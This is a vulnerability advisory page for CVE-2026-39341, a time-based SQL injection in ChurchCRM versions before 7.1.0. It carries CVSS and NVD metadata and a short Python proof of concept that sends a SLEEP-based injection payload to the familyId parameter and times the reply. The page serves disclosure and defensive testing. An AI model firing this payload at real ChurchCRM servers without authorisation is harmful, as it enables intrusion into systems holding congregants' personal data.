Security Vulnerability Report
CVE-2026-39341 CVSS 8.1 HIGH

CVE-2026-39341

Published: 2026-04-07 18:16:46
Last Modified: 2026-04-15 20:09:52

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, the application is vulnerable to time-based SQL injection due to improper input validation. The endpoint Reports/ConfirmReportEmail.php?familyId= does not correctly sanitise user input; specifically, the sanitised value is not the one used to build the SQL query. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
import requests
import time


def exploit_sqli(target_url):
    """
    PoC for CVE-2026-39341
    Target: ChurchCRM < 7.1.0
    Endpoint: /Reports/ConfirmReportEmail.php?familyId=
    Type: Time-based SQL Injection
    """
    # Construct the vulnerable endpoint
    full_url = f"{target_url}/Reports/ConfirmReportEmail.php"

    # Payload to trigger time-based delay
    # Checks if the database waits for 5 seconds
    payload = "?familyId=1' AND SLEEP(5)-- -"

    print(f"[*] Sending payload to: {full_url}")

    try:
        start_time = time.time()
        response = requests.get(full_url + payload, timeout=10)
        end_time = time.time()
        elapsed_time = end_time - start_time

        if elapsed_time >= 5:
            print(f"[+] Vulnerability confirmed! Response took {elapsed_time:.2f} seconds.")
            print("[+] The application is vulnerable to CVE-2026-39341.")
        else:
            print(f"[-] Vulnerability not detected. Response took {elapsed_time:.2f} seconds.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost"
    exploit_sqli(target)

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-3h69-vjff-jj5c (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-39341",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T18:16:46.150",
    "lastModified": "2026-04-15T20:09:52.000",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, the application is vulnerable to time-based SQL injection due to an improper input validation. Endpoint Reports/ConfirmReportEmail.php?familyId= is not correctly sanitising user input, specifically, the sanitised input is not used to create the SQL query. This vulnerability is fixed in 7.1.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.1.0",
                "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-3h69-vjff-jj5c",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}